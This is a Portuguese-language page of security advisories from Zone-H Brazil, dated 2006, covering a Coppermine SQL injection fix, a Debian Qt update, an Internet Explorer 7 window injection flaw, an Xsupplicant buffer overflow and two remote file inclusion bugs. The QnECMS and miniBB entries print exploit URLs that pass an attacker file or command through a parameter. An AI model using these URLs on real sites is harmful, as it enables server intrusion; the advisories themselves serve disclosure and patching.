Zone-H Advertisement
Home arrow Avisos de Segurança
05 de julho de 2009
 
 
Ataques desta semana
O.S.  Defs.  %
Win 2003  4243  46.12%
Linux  3965  43.10%
Win 2000  486  5.28%
FreeBSD  208  2.26%
Win 2008  112  1.22%
Other  185  2.01%

Total de ataques: 9199 dos quais 3045 único(s) no ip e 6154 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Zone-H.org
Área de download
Avisos de Segurança
Coppermine: Falha de Sql Injection Imprimir E-mail
Avaliação do Usuário: / 0
Por Marcelo Almeida (Vympel)   
30 de outubro de 2006
Foi descoberto pelo time de desenvolvedores do Coppermine uma falha de sql injection que pode ser explorada para obter informações sensíveis do sistema afetado.
Os usuário devem editar o aquivo picmgr.php para remover o parametro incorreto e impedir este ataque.
Versão original:

	$aid = isset($_GET['aid']) ? ($_GET['aid']) : 0;

Troque para:

	$aid = isset($_GET['aid']) ? (int) $_GET['aid'] : 0;
 

 Esta correção impede somente o ataque considerado mais grave. Outras falhas de menor perigo foram encontradas e poderam ser corrigidas executando o pacote de atualização.

 Aviso original

 
DSA 1200-1: Atualização para pacote Qt corrige falha de integer overflow Imprimir E-mail
Avaliação do Usuário: / 0
Por Marcelo Almeida (Vympel)   
30 de outubro de 2006

A Debian disponibilizou pacotes de atualização para a biblioteca qt-x11-free que corrigem uma falha de integer overflow que pode ser explorada remota e localmente.

Lista de atualização e plataformas... 

Leia mais...
 
Internet Explorer 7 Falha de injeção de janela Imprimir E-mail
Avaliação do Usuário: / 1
Por Marcelo Almeida (Vympel)   
30 de outubro de 2006

Uma falha de segurança foi reportada pela Secunia que pode comprometer usuários usando Internet Explorer 7.
Enquanto o usuário estiver navegando, pode se injetar conteúdo de outros sites sem que ele perceba que o site que está sendo mostrado não é o site onde estava navegando.

A Secunia disponibilizou um link onde os usuários podem testar se seu sistema é afetado.
http://secunia.com/multiple_browsers_window_injection_vulnerability_test/

Solução
A Microsoft não desenvolveu nenhuma atualização para esta falha.
Os usuários que tiverem seu sistema vulnerável não devem navegar em sites inseguros ao mesmo tempo que sites seguros.

Aviso original

 

 
Xsupplicant "eap_do_notify()" Falha de Buffer Overflow Imprimir E-mail
Avaliação do Usuário: / 0
Por Marcelo Almeida (Vympel)   
30 de outubro de 2006

Uma falha de segurança foi reportada no Xsupplicant que pode comprometer o sistema afetado.

O erro é causado por um erro no limite da função "eap_do_notifiY". Esta falha causa um stack-based overflow quando é enviado um pacote EAP quebrado.

Se explorada corretamente, pode se executar comandos no sistema afetado com privilégios de "root".

Solução:
Atualize para a versão 1.2.8.

Descoberta por:
Yannick Van Osselaer

Aviso original:
http://open1x.sourceforge.net/
http://www.mandriva.com/security/advisories?name=MDKSA-2006:189
http://open1x.cvs.sourceforge.net/ope...icant/src/eap.c?r1=1.135&r2=1.136

 
QnECMS: Inclusão de Arquivos Remotos Imprimir E-mail
Avaliação do Usuário: / 0
30 de outubro de 2006
Nome do Script: QnECMS
Site do script: http://www.qnecms.co.uk/
Versão Afetada: 2.5.6 e anteriores

Encontrado por K-159
Email: eufrato[at]gmail.com

Exploração:

http://victim.com/[path]/admin/include/headerscripts.php?adminfolderpath=[attacker]
 
miniBB: Inclusão de Arquivos Remotos Imprimir E-mail
Avaliação do Usuário: / 0
26 de outubro de 2006
Nome do Script: miniBB
Site do script: http://www.minibb.net/download.html
Versão Afetada: v.2.0.2

Encontrado pelo Polonês Kacper (a.k.a Rahim)
Email: Este endereço de e-mail está sendo protegido de spam, você precisa de Javascript habilitado para vê-lo

Exploração:

http://www.site.com/[miniBB_path]/bb_func_txt.php?pathToFiles=[CMD]
 
<< Início < Anterior 1 2 3 4 5 6 7 8 9 10 Próximo > Fim >>

Resultados 157 - 182 de 236
 
Top! Top!